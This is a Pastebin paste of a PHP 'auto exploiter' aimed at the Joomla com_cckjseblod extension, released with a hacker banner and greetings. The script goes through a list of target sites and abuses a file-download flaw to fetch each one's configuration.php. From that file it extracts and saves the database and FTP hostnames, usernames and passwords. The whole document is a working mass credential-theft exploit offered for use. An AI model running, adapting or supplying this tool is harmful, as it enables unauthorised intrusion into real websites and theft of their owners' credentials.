API tools faq
paste
Advertisement
Guest User

Joomla com_cckjseblod auto exploiter

a guest
Aug 28th, 2016
79
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.60 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. // vedio explan for how is work script here : http://magsec.blogspot.com/2015/11/joomla-comcckjseblod-auto-exploiter.html
  4.  
  5.  @error_reporting(0);
  6. @set_time_limit(0);
  7.  
  8. // pls dont change the rights pls :) The Hacker make tool not tool make a hacker ;)
  9. print "
  10.  
  11. ____          __  __        _____             __  __
  12. |  _ \       |  \/  |      / ____|           |  \/  |
  13. | |_) |_   _  | \ / | __ _| |  __ _ __   ___ | \ / |
  14. |  _ <| | | | | |\/| |/ _` | | |_ | '_ \ / _ \| |\/| |
  15. | |_) | |_| | | |  | | (_| | |__| | | | | (_) | |  | |
  16. |____/ \__, | |_|  |_|\__,_|\_____|_| |_|\___/|_|  |_|
  17.       __/ | Joomla com_cckjseblod LFI
  18.      |___/  visit my blog : magsec.blogspot.com for more tools
  19.   Greetz : CodersLeeT - my Friends - incef - SJ Team - my brain <3 ^^
  20.  
  21. " ;
  22.  
  23.  
  24. $g=@file_get_contents($argv[1]);
  25. $ss=explode("\r\n",$g);
  26. $open=fopen("result.html","a");
  27.  
  28.  
  29. foreach ($ss as $links){
  30.   $lofe="$links/index.php?option=com_cckjseblod&task=download&file=configuration.php";
  31.   $gg=@file_get_contents($lofe);
  32.   if(preg_match("#class JConfig#",$gg)){
  33.      echo "\n[+] $links ==> infected\n";fwrite($open,"<br>[+] $links <br>");
  34.      preg_match("#tmp_path = '(.*?)\/tmp';#",$gg,$r);echo "    [-] path of site : $r[1]/\n";fwrite($open,"path of site : $r[1] <br>");
  35.  
  36.      echo "\t[*]>--database informations --< \n";  ///// database info
  37.      preg_match("#host = '(.*?)';#",$gg,$r);echo "\t\t[!] Host : $r[1]\n";fwrite($open,"host : $r[1] <br>");
  38.      preg_match_all("#user = '(.*?)';#",$gg,$rr);echo "\t\t[!] user : ".$rr[1][1]."\n";$aaa=$rr[1][1];fwrite($open,"user :$aaa <br>");
  39.      preg_match("#password = '(.*?)';#",$gg,$r);echo "\t\t[!] password : $r[1]\n";fwrite($open,"pass : $r[1] <br>");
  40.      preg_match("#db = '(.*?)';#",$gg,$r);echo "\t\t[!] Database : $r[1]\n";fwrite($open,"db: $r[1] <br>");
  41.  
  42.      echo "\t[*]>--Ftp informations --< \n";    /////// ftp info
  43.      preg_match("#ftp_enable = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp enable : $r[1]\n";
  44.      preg_match("#ftp_host = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp_host : $r[1]\n";fwrite($open,"ftp-host : $r[1] <br>");
  45.      preg_match("#ftp_port = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp port : $r[1]\n";fwrite($open,"ftp-port : $r[1] <br>");
  46.      preg_match("#ftp_user = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp user : $r[1]\n";fwrite($open,"ftp-user : $r[1] <br>");
  47.      preg_match("#ftp_pass = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp pass : $r[1]\n";fwrite($open,"ftp-pass : $r[1] <br>");
  48.      preg_match("#ftp_root = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp root : $r[1]\n";
  49.   }else{
  50.     echo "\n[+] $links ==> Not infected\n";
  51.   }
  52. }
  53. fclose($open);
  54. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!